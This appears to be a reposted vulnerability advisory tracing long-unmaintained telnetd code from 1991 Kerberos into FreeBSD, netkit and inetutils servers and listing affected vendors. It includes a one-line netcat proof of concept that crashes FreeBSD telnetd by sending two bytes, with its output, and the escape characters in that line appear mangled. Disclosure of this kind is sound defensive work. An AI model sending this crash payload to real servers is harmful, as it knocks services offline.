FreeBSD-telnetd, NetBSD-telnetd, netkit-telnetd, telnetd in Kerberos Version 5 Applications and inetutils-telnetd are standard telnet servers used in several Linux distributions, BSD systems, UNIX systems and commercial products:
- FreeBSD, NetBSD
- Debian, Fedora, Gentoo, ArchLinux, … – using inetutils-telnetd or netkit-telnetd
- specific Palo Alto appliances
- specific Cisco appliances
- specific Brocade appliances
- specific Arista appliances
- OS running telnetd from Kerberos Version 5 Applications: this may include BSD 4.3 Reno, UNICOS 5.1 to UNICOS 7.0, SunOs 3.5 to SunOs 4.1, DYNIX V3.0.17.9 and Ultrix 3.1 to Ultrix 4.0. Note that these OS may be EOL.
- …
From our understanding, the first implementation containing the vulnerabilities dates from February 1991. This is the Kerberos telnetd implementation available at https://github.com/krb5/krb5-appl/blob/f8420ba3e60160da670f4f9a5b9f5429f67cd174/telnet/telnetd.
This code has been merged into FreeBSD in the 90s. Then netkit-telnetd comes from a very old version of the FreeBSD telnetd. And finally inetutils-telnetd is a fork of netkit-telnetd.
These vulnerabilities are very old (at least 30 years).
In all these implementations, the vulnerable part of the code base has not been updated for 30 years and appears not to be maintained anymore.
A part of the list of affected products was obtained by using CVE-2020-10188 (a vulnerability in netkit-telnetd). We can find advisories from Cisco, Palo Alto, Brocade and Arista referencing CVE-2020-10188 in their products.
Furthermore, from https://github.com/krb5/krb5-appl/blob/f8420ba3e60160da670f4f9a5b9f5429f67cd174/telnet/README, the release date is February 22, 1991 and the supported OS are BSD 4.3 Reno, UNICOS 5.1 to UNICOS 7.0, SunOs 3.5 to SunOs 4.1, DYNIX V3.0.17.9 and Ultrix 3.1 to Ultrix 4.0. We can assume these OS running kerberos-telnetd are also vulnerable.
It is possible to remotely crash the “standard” FreeBSD telnetd server by sending 2 bytes (xffxf7) from the network, as shown below:
kali% printf “xffxf7” | nc -n -v 192.168.1.200 23
(UNKNOWN) [192.168.1.200] 23 (telnet) open
<FF><FD>%
kali%
This post was created with our nice and easy submission form. Create your post!
Do you mind if I quote a few of your articles as long as I provide credit and sources back to
your weblog? My blog site is in the exact same area of interest as yours
and my visitors would definitely benefit from a lot of the information you
provide here. Please let me know if this okay with you.
Cheers!
sure